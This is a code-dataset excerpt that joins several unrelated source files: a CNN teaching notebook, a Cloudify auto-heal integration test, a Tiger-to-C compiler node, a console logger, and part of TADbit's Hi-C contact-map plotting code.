# MAGIC <img src="http://i.imgur.com/k5hMtMK.png">
# MAGIC
# MAGIC <img src="http://i.imgur.com/ERV9pHW.gif">
# COMMAND ----------
# MAGIC %md <img src="http://i.imgur.com/TCN9C4P.png">
# COMMAND ----------
# MAGIC %md
# MAGIC ### AlexNet (2012)
# MAGIC
# MAGIC <img src="http://i.imgur.com/CpokDKV.jpg">
# MAGIC
# MAGIC <img src="http://i.imgur.com/Ld2QhXr.jpg">
# COMMAND ----------
# MAGIC %md
# MAGIC ### Back to our labs: Still Overfitting
# MAGIC
# MAGIC We're making progress on our test error -- about 99% -- but just a bit for all the additional time, due to the network overfitting the data.
# MAGIC
# MAGIC There are a variety of techniques we can take to counter this -- forms of regularization.
# MAGIC
# MAGIC Let's try a relatively simple solution solution that works surprisingly well: add a pair of `Dropout` filters, a layer that randomly omits a fraction of neurons from each training batch (thus exposing each neuron to only part of the training data).
# MAGIC
# MAGIC We'll add more convolution kernels but shrink them to 3x3 as well.
# COMMAND ----------
model = Sequential()
model.add(Conv2D(32, # number of kernels
(3, 3), # kernel size
padding='valid',
input_shape=(28, 28, 1)))
model.add(Activation('relu'))
model.add(Conv2D(32, (3, 3)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2,2)))
model.add(Dropout(rate=1-0.25)) # <- regularize, new parameter rate added (rate=1-keep_prob)
model.add(Flatten())
model.add(Dense(128))
model.add(Activation('relu'))
model.add(Dropout(rate=1-0.5)) # <-regularize, new parameter rate added (rate=1-keep_prob)
model.add(Dense(10))
model.add(Activation('softmax'))
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
history = model.fit(X_train, y_train, batch_size=128, epochs=15, verbose=2)
scores = model.evaluate(X_test, y_test, verbose=2)
print
for i in range(len(model.metrics_names)):
print("%s: %f" % (model.metrics_names[i], scores[i]))
# COMMAND ----------
# MAGIC %md
# MAGIC While that's running, let's look at some more recent ConvNet architectures:
# MAGIC
# MAGIC ### VGG16 (2014)
# MAGIC
# MAGIC <img src="http://i.imgur.com/gl4kZDf.png">
# COMMAND ----------
# MAGIC %md
# MAGIC ### GoogLeNet (2014)
# MAGIC
# MAGIC <img src="http://i.imgur.com/hvmtDqN.png">
# MAGIC
# MAGIC *"Inception" layer: parallel convolutions at different resolutions*
# MAGIC
# MAGIC ### Residual Networks (2015-)
# MAGIC
# MAGIC Skip layers to improve training (error propagation). Residual layers learn from details at multiple previous layers.
# MAGIC
# MAGIC <img src="http://i.imgur.com/32g8Ykl.png">
# COMMAND ----------
# MAGIC %md
# MAGIC ---
# MAGIC
# MAGIC > __ASIDE: Atrous / Dilated Convolutions__
# MAGIC
# MAGIC > An atrous or dilated convolution is a convolution filter with "holes" in it. Effectively, it is a way to enlarge the filter spatially while not adding as many parameters or attending to every element in the input.
# MAGIC
# MAGIC > Why? Covering a larger input volume allows recognizing coarser-grained patterns; restricting the number of parameters is a way of regularizing or constraining the capacity of the model, making training easier.
# MAGIC
# MAGIC ---
# COMMAND ----------
# MAGIC %md
# MAGIC ## *Lab Wrapup*
# MAGIC
# MAGIC From the last lab, you should have a test accuracy of over 99.1%
# MAGIC
# MAGIC For one more activity, try changing the optimizer to old-school "sgd" -- just to see how far we've come with these modern gradient descent techniques in the last few years.
# MAGIC
# MAGIC Accuracy will end up noticeably worse ... about 96-97% test accuracy. Two key takeaways:
# MAGIC
# MAGIC * Without a good optimizer, even a very powerful network design may not achieve results
# MAGIC * In fact, we could replace the word "optimizer" there with
# MAGIC * initialization
# MAGIC * activation
# MAGIC * regularization
# MAGIC * (etc.)
# MAGIC * All of these elements we've been working with operate together in a complex way to determine final performance
# COMMAND ----------
# MAGIC %md
# MAGIC Of course this world evolves fast - see the new kid in the CNN block -- **capsule networks**
# MAGIC
# MAGIC > Hinton: “The pooling operation used in convolutional neural networks is a big mistake and the fact that it works so well is a disaster.”
# MAGIC
# MAGIC Well worth the 8 minute read:
# MAGIC * [https://medium.com/ai%C2%B3-theory-practice-business/understanding-hintons-capsule-networks-part-i-intuition-b4b559d1159b](https://medium.com/ai%C2%B3-theory-practice-business/understanding-hintons-capsule-networks-part-i-intuition-b4b559d1159b)
# MAGIC
# MAGIC To understand deeper:
# MAGIC * original paper: [https://arxiv.org/abs/1710.09829](https://arxiv.org/abs/1710.09829)
# MAGIC
# MAGIC [Keras capsule network example](https://keras.io/examples/cifar10_cnn_capsule/)
# COMMAND ----------
# MAGIC %md
# MAGIC # More resources
# MAGIC
# MAGIC - http://www.wildml.com/2015/12/implementing-a-cnn-for-text-classification-in-tensorflow/
# MAGIC - https://openai.com/
# COMMAND ----------
| unlicense | 1,029,960,627,330,714,800 | 38.554386 | 455 | 0.712499 | false |
isaac-s/cloudify-system-tests | cosmo_tester/test_suites/test_blueprints/nodecellar_test_autoheal.py | 1 | 5154 | ########
# Copyright (c) 2014 GigaSpaces Technologies Ltd. All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# * See the License for the specific language governing permissions and
# * limitations under the License.
import time
import requests
from cosmo_tester.framework.git_helper import clone
from cosmo_tester.framework.util import YamlPatcher
from cosmo_tester.test_suites.test_blueprints.nodecellar_test import (
OpenStackNodeCellarTestBase)
class OpenStackAutohealNodeCellarTest(OpenStackNodeCellarTestBase):
AUTOHEAL_GROUP_YAML = {
'autohealing_group': {
'members': ['nodejs_host'],
'policies': {
'simple_autoheal_policy': {
'type': 'cloudify.policies.types.host_failure',
'properties': {
'service': ['cpu.total.system']
},
'triggers': {
'auto_heal_trigger': {
'type':
'cloudify.policies.triggers.execute_workflow',
'parameters': {
'workflow': 'heal',
'workflow_parameters': {
'node_instance_id': {
'get_property': ['SELF', 'node_id']
},
'diagnose_value': {
'get_property': ['SELF', 'diagnose']
},
}
}
}
}
}
}
}
}
def _test_nodecellar_impl(self, blueprint_file):
self.repo_dir = clone(self.repo_url, self.workdir)
self.blueprint_yaml = self.repo_dir / blueprint_file
self.modify_blueprint()
before_install, after_install = self.upload_deploy_and_execute_install(
inputs=self.get_inputs()
)
self.post_install_assertions(before_install, after_install)
self.kill_nodejs_vm()
# make sure nodecellar is down
self.assert_nodecellar_down(self.public_ip)
self.wait_for_autoheal(after_install)
after_autoheal = self.get_manager_state()
self.post_autoheal_assertions(after_install, after_autoheal)
self.execute_uninstall()
self.post_uninstall_assertions()
def kill_nodejs_vm(self, timeout=10):
end = time.time() + timeout
nova_controller, _, _ = self.env.handler.openstack_clients()
srv = [s for s in nova_controller.servers.list() if 'nodejs' in s.name]
self.assertEqual(len(srv), 1)
srv = srv[0]
srv.delete()
while time.time() < end and srv in nova_controller.servers.list():
time.sleep(1)
def get_autoheal_execution(self):
executions = self.client.executions.list(
deployment_id=self.deployment_id)
for e in executions:
if e.workflow_id == 'heal':
return e
return None
def wait_for_autoheal(self, before, timeout=1200):
end = time.time() + timeout
autoheal_execution = None
while time.time() < end:
autoheal_execution = self.get_autoheal_execution()
if autoheal_execution is not None:
break
time.sleep(10)
self.assertIsNotNone(autoheal_execution, msg="Timed out waiting "
"for auto-heal workflow")
self.wait_for_execution(autoheal_execution, end - time.time())
def assert_nodecellar_down(self, public_ip):
with self.assertRaises(requests.ConnectionError):
requests.get('http://{0}:8080'.format(self.public_ip))
def post_autoheal_assertions(self, before_state, after_state):
delta = self.get_manager_state_delta(before_state, after_state)
for key in ['blueprints', 'deployments', 'node_state',
'nodes', 'deployment_nodes']:
self.assertEqual(len(delta[key]), 0)
self.assert_nodecellar_working(self.public_ip)
def modify_blueprint(self):
with YamlPatcher(self.blueprint_yaml) as patch:
patch.merge_obj('groups', self.AUTOHEAL_GROUP_YAML)
print self.blueprint_yaml
def get_inputs(self):
return {
'image': self.env.ubuntu_image_id,
'flavor': self.env.small_flavor_id,
'agent_user': 'ubuntu'
}
def test_openstack_autoheal_nodecellar(self):
self._test_openstack_nodecellar('openstack-blueprint.yaml')
| apache-2.0 | -1,801,459,323,801,139,700 | 35.295775 | 79 | 0.556849 | false |
yasserglez/pytiger2c | packages/pytiger2c/ast/andoperatornode.py | 1 | 2345 | # -*- coding: utf-8 -*-
"""
Clase C{AndOperatorNode} del árbol de sintáxis abstracta.
"""
from pytiger2c.ast.binarylogicaloperatornode import BinaryLogicalOperatorNode
from pytiger2c.types.integertype import IntegerType
class AndOperatorNode(BinaryLogicalOperatorNode):
"""
Clase C{AndOperatorNode} del árbol de sintáxis abstracta.
Representa la operación lógica C{AND}, representada con el operador C{&}
en Tiger, entre dos números enteros. Este operador retornará 1 en caso
de que el resultado de evaluar la expresión sea verdadero, 0 en otro caso.
"""
def __init__(self, left, right):
"""
Inicializa la clase C{AndOperatorNode}.
Para obtener información acerca de los parámetros recibidos por
este método consulte la documentación del método C{__init__}
en la clase C{BinaryOperatorNode}.
"""
super(AndOperatorNode, self).__init__(left, right)
def generate_code(self, generator):
"""
Genera el código C correspondiente a la estructura del lenguaje Tiger
representada por el nodo.
@type generator: C{CodeGenerator}
@param generator: Clase auxiliar utilizada en la generación del
código C correspondiente a un programa Tiger.
@raise CodeGenerationError: Esta excepción se lanzará cuando se produzca
algún error durante la generación del código correspondiente al nodo.
La excepción contendrá información acerca del error.
"""
self.scope.generate_code(generator)
result_var = generator.define_local(IntegerType().code_type)
self.left.generate_code(generator)
generator.add_statement('if (!{left}) {{'.format(left=self.left.code_name))
generator.add_statement('{result} = 0; }}'.format(result=result_var))
generator.add_statement('else {')
self.right.generate_code(generator)
generator.add_statement('if ({right}) {{'.format(right=self.right.code_name))
generator.add_statement('{result} = 1; }}'.format(result=result_var))
generator.add_statement('else {')
generator.add_statement('{result} = 0; }}'.format(result=result_var))
generator.add_statement('}')
self._code_name = result_var
| mit | -9,185,024,468,901,850,000 | 41.181818 | 85 | 0.663362 | false |
rubik/pyg | pyg/log.py | 1 | 8604 | import os
import sys
import logging
__all__ = ['logger']
try:
from colorama import init, Fore, Style
init(autoreset=False)
colors = {
'good' : Fore.GREEN,
'bad' : Fore.RED,
'vgood' : Fore.GREEN + Style.BRIGHT,
'vbad' : Fore.RED + Style.BRIGHT,
'std' : '', # Do not color "standard" text
'warn' : Fore.YELLOW + Style.BRIGHT,
'reset' : Style.RESET_ALL,
}
except ImportError:
colors = {
'good' : '',
'bad' : '',
'vgood' : '',
'vbad' : '',
'std' : '',
'warn' : '',
'reset' : '',
}
def get_console_width():
"""
Return width of available window area. Autodetection works for
Windows and POSIX platforms. Returns 80 for others
Code from http://bitbucket.org/techtonik/python-wget
"""
if os.name == 'nt':
STD_INPUT_HANDLE = -10
STD_OUTPUT_HANDLE = -11
STD_ERROR_HANDLE = -12
# get console handle
from ctypes import windll, Structure, byref
try:
from ctypes.wintypes import SHORT, WORD, DWORD
except ImportError:
# workaround for missing types in Python 2.5
from ctypes import (
c_short as SHORT, c_ushort as WORD, c_ulong as DWORD)
console_handle = windll.kernel32.GetStdHandle(STD_OUTPUT_HANDLE)
# CONSOLE_SCREEN_BUFFER_INFO Structure
class COORD(Structure):
_fields_ = [("X", SHORT), ("Y", SHORT)]
class SMALL_RECT(Structure):
_fields_ = [("Left", SHORT), ("Top", SHORT),
("Right", SHORT), ("Bottom", SHORT)]
class CONSOLE_SCREEN_BUFFER_INFO(Structure):
_fields_ = [("dwSize", COORD),
("dwCursorPosition", COORD),
("wAttributes", WORD),
("srWindow", SMALL_RECT),
("dwMaximumWindowSize", DWORD)]
sbi = CONSOLE_SCREEN_BUFFER_INFO()
ret = windll.kernel32.GetConsoleScreenBufferInfo(console_handle, byref(sbi))
if ret == 0:
return 0
return sbi.srWindow.Right+1
elif os.name == 'posix':
from fcntl import ioctl
from termios import TIOCGWINSZ
from array import array
winsize = array("H", [0] * 4)
try:
ioctl(sys.stdout.fileno(), TIOCGWINSZ, winsize)
except IOError:
pass
return (winsize[1], winsize[0])[0]
return 80
class Logger(object):
VERBOSE = logging.DEBUG - 1
DEBUG = logging.DEBUG
INFO = logging.INFO
WARN = logging.WARNING
ERROR = logging.ERROR
FATAL = logging.FATAL
## This attribute is set to True when the user does not want colors
## by __init__.py
_NO_COLORS = False
def __init__(self,level=None):
self.indent = 0
self.level = level or Logger.INFO
self._stack = ['']
self.enabled = True
def disable_colors(self):
self._NO_COLORS = True
for k in colors.keys():
colors[k] = ''
def newline(self):
'''Print a newline character (\n) on Standard Output.'''
sys.stdout.write('\n')
def raise_last(self, exc):
raise exc(self.last_msg)
@property
def last_msg(self):
return self._stack[-1]
def ask(self, message=None, bool=None, choices=None, dont_ask=False):
if bool is not None:
if bool in (True, False) or (isinstance(bool, (list, tuple)) and len(bool) == 1):
if bool == False:
txt = "Cancel"
elif bool == True:
txt = "OK"
else:
txt = bool[0]
self.log(self.info, 'std', "%s, %s..."%(message, txt), addn=False)
if not dont_ask:
raw_input()
return
else:
if dont_ask:
self.log(self.info, 'std', '%s ? Yes'%message)
return True
while True:
self.log(self.info, 'std', "yes: "+bool[0])
self.log(self.info, 'std', "no: "+bool[1])
try:
self.log(self.info, 'std', '%s ? (y/[n]) '%message, addn=False)
ans = raw_input()
except Exception:
continue
# default choice : no
if not ans.strip():
return False
if ans not in 'yYnN':
continue
return ans in 'yY'
if choices:
if isinstance(choices, dict):
_data = choices
choices = choices.keys()
else:
_data = None
self.log(self.info, 'std', message)
for n, choice in enumerate(choices):
self.log(self.info, 'std', "%2d - %s"%(n+1, choice))
while True:
try:
ans = input('Your choice ? ')
except Exception:
self.log(self.info, 'std', "Please enter selected option's number.")
continue
if ans < 0 or ans > len(choices):
continue
break
idx = choices[ans-1]
return (_data[idx] if _data else idx)
def verbose(self, msg, *a, **kw):
self.log(self.VERBOSE, 'std', msg, *a, **kw)
def debug(self, msg, *a, **kw):
self.log(self.DEBUG, 'std', msg, *a, **kw)
def info(self, msg, *a, **kw):
self.log(self.INFO, 'std', msg, *a, **kw)
def success(self, msg, *a, **kw):
self.log(self.INFO, 'good', msg, *a, **kw)
def warn(self, msg, *a, **kw):
self.log(self.WARN, 'warn', msg, *a, **kw)
def error(self, msg, *a, **kw):
self.log(self.ERROR, 'bad', msg, *a, **kw)
exc = kw.get('exc', None)
if exc is not None:
raise exc(self.last_msg)
def fatal(self, msg, *a, **kw):
self.log(self.FATAL, 'vbad', msg, *a, **kw)
exc = kw.get('exc', None)
if exc is not None:
raise exc(self.last_msg)
def exit(self, msg=None, status=1):
if msg != None:
self.log(self.FATAL, 'vbad', msg)
sys.exit(status)
def log(self, level, col, msg, *a, **kw):
'''
This is the base function that logs all messages. This function prints a newline character too,
unless you specify ``addn=False``. When the message starts with a return character (\r) it automatically
cleans the line.
'''
if level >= self.level and self.enabled:
std = sys.stdout
if level >= self.ERROR:
std = sys.stderr
## We can pass to logger.log any object: it must have at least
## a __repr__ or a __str__ method.
msg = str(msg)
if msg.startswith('\r') or self.last_msg.startswith('\r'):
## We have to clear the line in case this message is longer than
## the previous
std.write('\r' + ' ' * get_console_width())
msg = '\r' + ' ' * self.indent + msg.lstrip('\r').format(*a)
else:
try:
msg = ' ' * self.indent + msg.format(*a)
except KeyError:
msg = ' ' * self.indent + msg
col, col_reset = colors[col], colors['reset']
if self._NO_COLORS:
col, col_reset = '', ''
std.write(col + msg + col_reset)
## Automatically adds a newline character
if kw.get('addn', True):
self.newline()
## flush() makes the log immediately readable
std.flush()
self._stack.append(msg)
logger = Logger()
if __name__ == '__main__':
print logger.ask("Beware, you enter a secret place", bool=True)
print logger.ask("Sorry, can't install this package", bool=False)
print logger.ask("Sorry, can't install this package", bool=['Press any key to continue'])
print logger.ask('Proceed', bool=('remove files', 'cancel'))
print logger.ask('Do you want to upgrade', bool=('upgrade version', 'keep working version'))
print logger.ask('Installation method', choices=('Egg based', 'Flat directory'))
print logger.ask('some dict', choices={'choice a': 'a', 'choice b': 'b', 'choice c': 'c'})
| mit | 6,918,560,899,047,315,000 | 30.866667 | 112 | 0.496165 | false |
3DGenomes/tadbit | _pytadbit/mapping/analyze.py | 1 | 67679 | """
18 Nov 2014
"""
from warnings import warn
from collections import OrderedDict
from pysam import AlignmentFile
from scipy.stats import norm as sc_norm, skew, kurtosis
from scipy.stats import pearsonr, spearmanr, linregress
from scipy.sparse.linalg import eigsh
from numpy.linalg import eigh
import numpy as np
try:
from matplotlib import rcParams
from matplotlib import pyplot as plt
from matplotlib.backends.backend_pdf import PdfPages
from matplotlib.colors import LinearSegmentedColormap
except ImportError:
warn('matplotlib not found\n')
from pytadbit import HiC_data
from pytadbit.utils.extraviews import tadbit_savefig, setup_plot
from pytadbit.utils.tadmaths import nozero_log_matrix as nozero_log
from pytadbit.utils.tadmaths import right_double_mad as mad
from pytadbit.parsers.hic_parser import load_hic_data_from_reads
from pytadbit.utils.extraviews import nicer
from pytadbit.utils.file_handling import mkdir
def hic_map(data, resolution=None, normalized=False, masked=None,
by_chrom=False, savefig=None, show=False, savedata=None,
focus=None, clim=None, perc_clim=None, cmap='jet', pdf=False, decay=True,
perc=20, name=None, decay_resolution=None, **kwargs):
"""
function to retrieve data from HiC-data object. Data can be stored as
a square matrix, or drawn using matplotlib
:param data: can be either a path to a file with pre-processed reads
(filtered or not), or a Hi-C-data object
:param None resolution: at which to bin the data (try having a dense matrix
with < 10% of cells with zero interaction counts). Note: not necessary
if a hic_data object is passed as 'data'.
:param False normalized: used normalized data, based on precalculated biases
:param masked: a list of columns to be removed. Usually because to few
interactions
:param False by_chrom: data can be stored in a partitioned way. This
parameter can take the values of:
* 'intra': one output per each chromosome will be created
* 'inter': one output per each possible pair of chromosome will be
created
* 'all' : both of the above outputs
:param None savefig: path where to store the output images. Note that, if
the by_chrom option is used, then savefig will be the name of the
directory containing the output files.
:param None savedata: path where to store the output matrices. Note that, if
the by_chrom option is used, then savefig will be the name of the
directory containing the output files.
:param None focus: can be either two number (i.e.: (1, 100)) specifying the
start and end position of the sub-matrix to display (start and end, along
the diagonal of the original matrix); or directly a chromosome name; or
two chromosome names (i.e.: focus=('chr2, chrX')), in order to store the
data corresponding to inter chromosomal interactions between these two
chromosomes
:param True decay: plot the correlation between genomic distance and
interactions (usually a decay).
:param False force_image: force to generate an image even if resolution is
crazy...
:param None clim: cutoff for the upper and lower bound in the coloring scale
of the heatmap. (perc_clim should be set to None)
:param None perc_clim: cutoff for the upper and lower bound in the coloring scale
of the heatmap; in percentile. (clim should be set to None)
:param False pdf: when using the bny_chrom option, to specify the format of
the stored images
:param jet cmap: color map to be used for the heatmap; "tadbit" color map is
also implemented and will use percentiles of the distribution of
interactions to defines intensities of red.
:param None decay_resolution: chromatin fragment size to consider when
calculating decay of the number of interactions with genomic distance.
Default is equal to resolution of the matrix.
"""
if isinstance(data, str):
data = load_hic_data_from_reads(data, resolution=resolution, **kwargs)
if not kwargs.get('get_sections', True) and decay:
warn('WARNING: not decay not available when get_sections is off.')
decay = False
if clim and perc_clim:
raise Exception('ERROR: only one of clim or perc_clim should be set\n')
hic_data = data
resolution = data.resolution
if not decay_resolution:
decay_resolution = resolution
if hic_data.bads and not masked:
masked = hic_data.bads
# save and draw the data
if by_chrom:
if focus:
raise Exception('Incompatible options focus and by_chrom\n')
if savedata:
mkdir(savedata)
if savefig:
mkdir(savefig)
for i, crm1 in enumerate(hic_data.chromosomes):
for crm2 in hic_data.chromosomes.keys()[i:]:
if by_chrom == 'intra' and crm1 != crm2:
continue
if by_chrom == 'inter' and crm1 == crm2:
continue
try:
subdata = hic_data.get_matrix(focus=(crm1, crm2), normalized=normalized)
start1, _ = hic_data.section_pos[crm1]
start2, _ = hic_data.section_pos[crm2]
masked1 = {}
masked2 = {}
if focus and hic_data.bads:
# rescale masked
masked1 = dict([(m - start1, hic_data.bads[m])
for m in hic_data.bads])
masked2 = dict([(m - start2, hic_data.bads[m])
for m in hic_data.bads])
if masked1 or masked2:
for i in xrange(len(subdata)):
if i in masked1:
subdata[i] = [float('nan')
for j in xrange(len(subdata))]
for j in xrange(len(subdata)):
if j in masked2:
subdata[i][j] = float('nan')
if savedata:
hic_data.write_matrix('%s/%s.mat' % (
savedata, '_'.join(set((crm1, crm2)))),
focus=(crm1, crm2),
normalized=normalized)
if show or savefig:
if (len(subdata) > 10000
and not kwargs.get('force_image', False)):
warn('WARNING: Matrix image not created, more than '
'10000 rows, use a lower resolution to create images')
continue
draw_map(subdata,
OrderedDict([(k, hic_data.chromosomes[k])
for k in hic_data.chromosomes.keys()
if k in [crm1, crm2]]),
hic_data.section_pos,
'%s/%s.%s' % (savefig,
'_'.join(set((crm1, crm2))),
'pdf' if pdf else 'png'),
show, one=True, clim=clim, perc_clim=perc_clim,
cmap=cmap, decay_resolution=decay_resolution,
perc=perc, name=name, cistrans=float('NaN'))
except ValueError, e:
print 'Value ERROR: problem with chromosome %s' % crm1
print str(e)
except IndexError, e:
print 'Index ERROR: problem with chromosome %s' % crm1
print str(e)
else:
if savedata:
hic_data.write_matrix(savedata, focus=focus,
normalized=normalized)
if show or savefig:
subdata = hic_data.get_matrix(focus=focus, normalized=normalized)
if (len(subdata) > 10000 and not kwargs.get('force_image', False)):
warn('WARNING: Matrix image not created, more than '
'10000 rows, use a lower resolution to create images')
return
start1 = hic_data._focus_coords(focus)[0]
if focus and masked:
# rescale masked
masked = dict([(m - start1, masked[m]) for m in masked])
if masked:
for i in xrange(len(subdata)):
if i in masked:
subdata[i] = [float('nan')
for j in xrange(len(subdata))]
for j in xrange(len(subdata)):
if j in masked:
subdata[i][j] = float('nan')
draw_map(subdata,
{} if focus else hic_data.chromosomes,
hic_data.section_pos, savefig, show,
one = True if focus else False, decay=decay,
clim=clim, perc_clim=perc_clim, cmap=cmap,
decay_resolution=decay_resolution,
perc=perc, normalized=normalized,
max_diff=kwargs.get('max_diff', None),
name=name, cistrans=float('NaN') if focus else
hic_data.cis_trans_ratio(normalized,
kwargs.get('exclude', None),
kwargs.get('diagonal', True),
kwargs.get('equals', None)))
def draw_map(data, genome_seq, cumcs, savefig, show, one=False, clim=None,
perc_clim=None, cmap='jet', decay=False, perc=20, name=None,
cistrans=None, decay_resolution=10000, normalized=False,
max_diff=None):
_ = plt.figure(figsize=(15.,12.5))
if not max_diff:
max_diff = len(data)
ax1 = plt.axes([0.34, 0.08, 0.6, 0.7205])
ax2 = plt.axes([0.07, 0.65, 0.21, 0.15])
if decay:
ax3 = plt.axes([0.07, 0.42, 0.21, 0.15])
plot_distance_vs_interactions(data, genome_seq=genome_seq, axe=ax3,
resolution=decay_resolution,
max_diff=max_diff, normalized=normalized)
ax4 = plt.axes([0.34, 0.805, 0.6, 0.04], sharex=ax1)
ax5 = plt.axes([0.34, 0.845, 0.6, 0.04], sharex=ax1)
ax6 = plt.axes([0.34, 0.885, 0.6, 0.04], sharex=ax1)
try:
minoridata = np.nanmin(data)
maxoridata = np.nanmax(data)
except AttributeError:
vals = [i for d in data for i in d if not np.isnan(i)]
minoridata = np.min(vals)
maxoridata = np.max(vals)
totaloridata = np.nansum([data[i][j] for i in xrange(len(data))
for j in xrange(i, len(data[i]))]) # may not be square
data = nozero_log(data, np.log2)
vals = np.array([i for d in data for i in d])
vals = vals[np.isfinite(vals)]
if perc_clim:
try:
clim = np.percentile(vals, perc_clim[0]), np.percentile(vals, perc_clim[1])
except ValueError:
clim = None
mindata = np.nanmin(vals)
maxdata = np.nanmax(vals)
diff = maxdata - mindata
norm = lambda x: (x - mindata) / diff
posI = 0.01 if not clim else norm(clim[0]) if clim[0] != None else 0.01
posF = 1.0 if not clim else norm(clim[1]) if clim[1] != None else 1.0
if cmap == 'tadbit':
cuts = perc
cdict = {'red' : [(0.0, 1.0, 1.0)],
'green': [(0.0, 1.0, 1.0)],
'blue' : [(0.0, 1.0, 1.0)]}
for i in np.linspace(posI, posF, cuts, endpoint=False):
prc = (i / (posF - posI)) / 1.75
pos = norm(np.percentile(vals, i * 100.))
# print '%7.4f %7.4f %7.4f %7.4f' % (prc, pos, np.percentile(vals, i * 100.), i)
cdict['red' ].append([pos, 1 , 1 ])
cdict['green'].append([pos, 1 - prc, 1 - prc])
cdict['blue' ].append([pos, 1 - prc, 1 - prc])
cdict['red' ].append([1.0, 1, 1])
cdict['green'].append([1.0, 0, 0])
cdict['blue' ].append([1.0, 0, 0])
cmap = LinearSegmentedColormap(cmap, cdict)
clim = None
else:
cmap = plt.get_cmap(cmap)
cmap.set_bad('darkgrey', 1)
ax1.imshow(data, interpolation='none',
cmap=cmap, vmin=clim[0] if clim else None, vmax=clim[1] if clim else None)
size1 = len(data)
size2 = len(data[0])
if size1 == size2:
for i in xrange(size1):
for j in xrange(i, size2):
if np.isnan(data[i][j]):
data[i][j] = 0
data[j][i] = 0
else:
for i in xrange(size1):
for j in xrange(size2):
if np.isnan(data[i][j]):
data[i][j] = 0
#data[j][i] = data[i][j]
try:
evals, evect = eigh(data)
sort_perm = evals.argsort()
evect = evect[sort_perm]
except:
evals, evect = None, None
data = [i for d in data for i in d if np.isfinite(i)]
gradient = np.linspace(np.nanmin(data),
np.nanmax(data), max(size1, size2))
gradient = np.vstack((gradient, gradient))
try:
h = ax2.hist(data, color='darkgrey', linewidth=2,
bins=20, histtype='step', density=True)
except AttributeError:
h = ax2.hist(data, color='darkgrey', linewidth=2,
bins=20, histtype='step', normed=True)
_ = ax2.imshow(gradient, aspect='auto', cmap=cmap,
vmin=clim[0] if clim else None, vmax=clim[1] if clim else None,
extent=(np.nanmin(data), np.nanmax(data) , 0, max(h[0])))
if genome_seq:
for crm in genome_seq:
ax1.vlines([cumcs[crm][0]-.5, cumcs[crm][1]-.5], cumcs[crm][0]-.5, cumcs[crm][1]-.5,
color='w', linestyle='-', linewidth=1, alpha=1)
ax1.hlines([cumcs[crm][1]-.5, cumcs[crm][0]-.5], cumcs[crm][0]-.5, cumcs[crm][1]-.5,
color='w', linestyle='-', linewidth=1, alpha=1)
ax1.vlines([cumcs[crm][0]-.5, cumcs[crm][1]-.5], cumcs[crm][0]-.5, cumcs[crm][1]-.5,
color='k', linestyle='--')
ax1.hlines([cumcs[crm][1]-.5, cumcs[crm][0]-.5], cumcs[crm][0]-.5, cumcs[crm][1]-.5,
color='k', linestyle='--')
if not one:
vals = [0]
keys = ['']
for crm in genome_seq:
vals.append(cumcs[crm][0])
keys.append(crm)
vals.append(cumcs[crm][1])
ax1.set_yticks(vals)
ax1.set_yticklabels('')
ax1.set_yticks([float(vals[i]+vals[i+1])/2
for i in xrange(len(vals) - 1)], minor=True)
ax1.set_yticklabels(keys, minor=True)
for t in ax1.yaxis.get_minor_ticks():
t.tick1On = False
t.tick2On = False
# totaloridata = ''.join([j + ('' if (i+1)%3 else ',') for i, j in enumerate(str(totaloridata)[::-1])])[::-1].strip(',')
# minoridata = ''.join([j + ('' if (i+1)%3 else ',') for i, j in enumerate(str(minoridata)[::-1])])[::-1].strip(',')
# maxoridata = ''.join([j + ('' if (i+1)%3 else ',') for i, j in enumerate(str(maxoridata)[::-1])])[::-1].strip(',')
plt.figtext(0.05,0.25, ''.join([
(name + '\n') if name else '',
'Number of interactions: %s\n' % str(totaloridata),
('' if np.isnan(cistrans) else
('Percentage of cis interactions: %.0f%%\n' % (cistrans*100))),
'Min interactions: %s\n' % (minoridata),
'Max interactions: %s\n' % (maxoridata)]))
ax2.set_xlim((np.nanmin(data), np.nanmax(data)))
ax2.set_ylim((0, max(h[0])))
ax1.set_xlim ((-0.5, size1 - .5))
ax1.set_ylim ((-0.5, size2 - .5))
ax2.set_xlabel('log interaction count')
# we reduce the number of dots displayed.... we just want to see the shape
subdata = np.array(list(set([float(int(d*100))/100 for d in data])))
try:
normfit = sc_norm.pdf(subdata, np.nanmean(data), np.nanstd(data))
except AttributeError:
normfit = sc_norm.pdf(subdata, np.mean(data), np.std(data))
ax2.plot(subdata, normfit, 'w.', markersize=2.5, alpha=.4)
ax2.plot(subdata, normfit, 'k.', markersize=1.5, alpha=1)
ax2.set_title('skew: %.3f, kurtosis: %.3f' % (skew(data),
kurtosis(data)))
try:
ax4.vlines(range(size1), 0, evect[:,-1], color='k')
except (TypeError, IndexError):
pass
ax4.hlines(0, 0, size2, color='red')
ax4.set_ylabel('E1')
ax4.set_yticklabels([])
try:
ax5.vlines(range(size1), 0, evect[:,-2], color='k')
except (TypeError, IndexError):
pass
ax5.hlines(0, 0, size2, color='red')
ax5.set_ylabel('E2')
ax5.set_yticklabels([])
try:
ax6.vlines(range(size1), 0, evect[:,-3], color='k')
except (TypeError, IndexError):
pass
ax6.hlines(0, 0, size2, color='red')
ax6.set_ylabel('E3')
ax6.set_yticklabels([])
xticklabels = ax4.get_xticklabels() + ax5.get_xticklabels() + ax6.get_xticklabels()
plt.setp(xticklabels, visible=False)
if savefig:
tadbit_savefig(savefig)
elif show:
plt.show()
plt.close('all')
def plot_distance_vs_interactions(data, min_diff=1, max_diff=1000, show=False,
genome_seq=None, resolution=None, axe=None,
savefig=None, normalized=False,
plot_each_cell=False):
"""
Plot the number of interactions observed versus the genomic distance between
the mapped ends of the read. The slope is expected to be around -1, in
logarithmic scale and between 700 kb and 10 Mb (according to the prediction
of the fractal globule model).
:param data: input file name (either tsv or TADbit generated BAM), or
HiC_data object or list of lists
:param 10 min_diff: lower limit (in number of bins)
:param 1000 max_diff: upper limit (in number of bins) to look for
:param 100 resolution: group reads that are closer than this resolution
parameter
:param_hash False plot_each_cell: if false, only the mean distances by bin
will be represented, otherwise each pair of interactions will be plotted.
:param None axe: a matplotlib.axes.Axes object to define the plot
appearance
:param None savefig: path to a file where to save the image generated;
if None, the image will be shown using matplotlib GUI (the extension
of the file name will determine the desired format).
